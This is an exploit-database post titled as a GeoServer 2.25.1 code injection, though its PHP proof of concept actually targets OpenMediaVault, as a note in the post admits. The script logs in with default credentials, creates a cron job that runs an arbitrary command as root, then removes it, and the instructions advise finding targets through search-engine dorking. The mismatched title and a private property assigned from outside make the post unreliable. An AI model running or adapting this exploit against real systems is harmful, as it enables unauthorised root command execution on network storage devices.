## https://sploitus.com/exploit?id=PACKETSTORM:182018
=============================================================================================================================================  
| # Title : GeoServer 2.25.1 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://github.com/geoserver/ |  
=============================================================================================================================================  
  
POC (note: the class below is named OpenMediaVaultExploit and sends its requests to OpenMediaVault's /rpc.php endpoint, not to GeoServer) :
  
[+] Dorking in Google or other search engines.
  
[+] Uses cURL to send the remote command.
  
[+] Line 118 set your target .  
  
[+] Line 123 set your command to execute.  
  
[+] save code as poc.php .  
  
[+] Usage : cmd => c:\www\test\php poc.php
  
[+] PayLoad :  
  
<?php  
  
class OpenMediaVaultExploit
{
    // Base URL of the target web interface; every RPC call below is a JSON POST
    // to "$targetUri/rpc.php" carrying a 'service'/'method' pair. That request
    // pattern, and the root cron entry created by executeCommand(), are the
    // artifacts a defender can look for.
    private $targetUri;
    // Credentials handed to the Session.login RPC method.
    private $username;
    private $password;
    // When true, removePayload() leaves the created cron entry in place.
    private $persistent;
    // UUID returned by Cron.set; consumed by Cron.delete in removePayload().
    private $cronUuid;
    // Version token (see checkVersion()) read by executeCommand(). It is never
    // assigned inside this class.
    private $versionNumber;

    /**
     * @param string $targetUri  base URL of the target, e.g. 'http://target-uri'
     * @param string $username   username for Session.login
     * @param string $password   password for Session.login
     * @param bool   $persistent keep the cron entry after execution (default false)
     */
    public function __construct($targetUri, $username, $password, $persistent = false)
    {
        $this->targetUri = $targetUri;
        $this->username = $username;
        $this->password = $password;
        $this->persistent = $persistent;
    }

    /**
     * POSTs $data JSON-encoded to $url and returns the decoded response array.
     *
     * A fresh curl handle is created per call with no cookie or timeout options,
     * so nothing from an earlier response is carried over. The curl_exec()
     * result is not checked: on transport failure json_decode() is handed an
     * empty string and the caller receives null.
     *
     * @param string $url
     * @param array  $data
     * @return mixed decoded JSON (array) or null
     */
    private function sendRequest($url, $data)
    {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'Content-Type: application/json'
        ]);
        $response = curl_exec($ch);
        curl_close($ch);

        return json_decode($response, true);
    }

    /**
     * Calls Session.login with the configured credentials.
     *
     * Note that the password is echoed to stdout before the request is sent.
     *
     * @return bool true only when the response contains 'authenticated' === true
     */
    public function login()
    {
        echo "Authenticating with OpenMediaVault using credentials {$this->username}:{$this->password}\n";

        $data = [
            'service' => 'Session',
            'method' => 'login',
            'params' => [
                'username' => $this->username,
                'password' => $this->password
            ],
            'options' => null
        ];

        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
        return isset($response['authenticated']) && $response['authenticated'] === true;
    }

    /**
     * Calls System.getInformation and returns the raw decoded response.
     *
     * Despite the message printed, no version check happens here; the caller
     * is expected to pass the result to checkVersion().
     *
     * @return mixed decoded response array, or null on failure
     */
    public function checkTarget()
    {
        echo "Trying to detect if target is running a vulnerable version of OpenMediaVault.\n";

        $data = [
            'service' => 'System',
            'method' => 'getInformation',
            'params' => null
        ];

        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
        return $response;
    }

    /**
     * Extracts a version token from a System.getInformation response.
     *
     * Reads $response['response']['version'], keeps the text before the first
     * '(' and strips all whitespace from it.
     *
     * @param mixed $response decoded response as returned by checkTarget()
     * @return string|null the version token, or null when the response is
     *                     empty or carries no version
     */
    public function checkVersion($response)
    {
        if (!empty($response)) {
            $version = $response['response']['version'] ?? null;
            return !is_null($version) ? preg_replace('/\s+/', '', explode('(', $version)[0]) : null;
        }
        return null;
    }

    /**
     * Creates a cron entry via Cron.set that runs $cmd as 'root' on every
     * minute/hour/day field ('*'), then applies the configuration.
     *
     * The shape of the '*' schedule value (array vs string) and the uuid sent
     * are chosen by comparing $versionNumber against literal strings with
     * >= / <=, i.e. plain PHP string ordering. The uuid returned by the server
     * is stored in $cronUuid for removePayload(). The resulting entry
     * (username 'root', type 'userdefined', command $cmd) is the on-host
     * artifact to audit for.
     *
     * @param string $cmd command placed in the cron entry
     * @return void
     */
    public function executeCommand($cmd)
    {
        echo "Executing command...\n";

        $schedule = $this->versionNumber >= '6.0.15-1' ? ['*'] : '*';
        $uuid = $this->versionNumber <= '3.0.15' ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4';

        $data = [
            'service' => 'Cron',
            'method' => 'set',
            'params' => [
                'uuid' => $uuid,
                'enable' => true,
                'execution' => 'exactly',
                'minute' => $schedule,
                'hour' => $schedule,
                'dayofmonth' => $schedule,
                'month' => $schedule,
                'dayofweek' => $schedule,
                'username' => 'root',
                'command' => $cmd,
                'sendemail' => false,
                'comment' => '',
                'type' => 'userdefined'
            ],
            'options' => null
        ];

        $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
        $this->cronUuid = $response['response']['uuid'] ?? '';
        $this->applyConfigChanges();
        echo "Cron payload execution triggered.\n";
    }

    /**
     * Calls Config.applyChangesBg with an empty module list and force=false.
     * The response is discarded.
     *
     * @return void
     */
    public function applyConfigChanges()
    {
        $data = [
            'service' => 'Config',
            'method' => 'applyChangesBg',
            'params' => [
                'modules' => [],
                'force' => false
            ],
            'options' => null
        ];

        $this->sendRequest($this->targetUri . '/rpc.php', $data);
    }

    /**
     * Unless $persistent is set, deletes the cron entry recorded in $cronUuid
     * via Cron.delete and applies the configuration again.
     *
     * Which message is printed depends only on the truthiness of the decoded
     * response, not on any status field inside it.
     *
     * @return void
     */
    public function removePayload()
    {
        if (!$this->persistent) {
            $data = [
                'service' => 'Cron',
                'method' => 'delete',
                'params' => [
                    'uuid' => $this->cronUuid
                ]
            ];

            $response = $this->sendRequest($this->targetUri . '/rpc.php', $data);
            if ($response) {
                $this->applyConfigChanges();
                echo "Cron payload entry successfully removed.\n";
            } else {
                echo "Cannot access cron services to remove payload.\n";
            }
        }
    }
}
  
// Usage
// Builds the client with a placeholder target and the credentials
// 'admin'/'openmediavault', then runs the sequence
// Session.login -> System.getInformation -> Cron.set -> Cron.delete
// (persistent is false, so the cron entry is removed afterwards).
$exploit = new OpenMediaVaultExploit('http://target-uri', 'admin', 'openmediavault', false);
if ($exploit->login()) {
    $response = $exploit->checkTarget();
    if ($response) {
        // Version token derived from the getInformation response; it is read
        // by executeCommand() when choosing the schedule shape and uuid.
        $exploit->versionNumber = $exploit->checkVersion($response);
        $exploit->executeCommand('your-command-here');
        $exploit->removePayload();
    }
}
  
?>  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================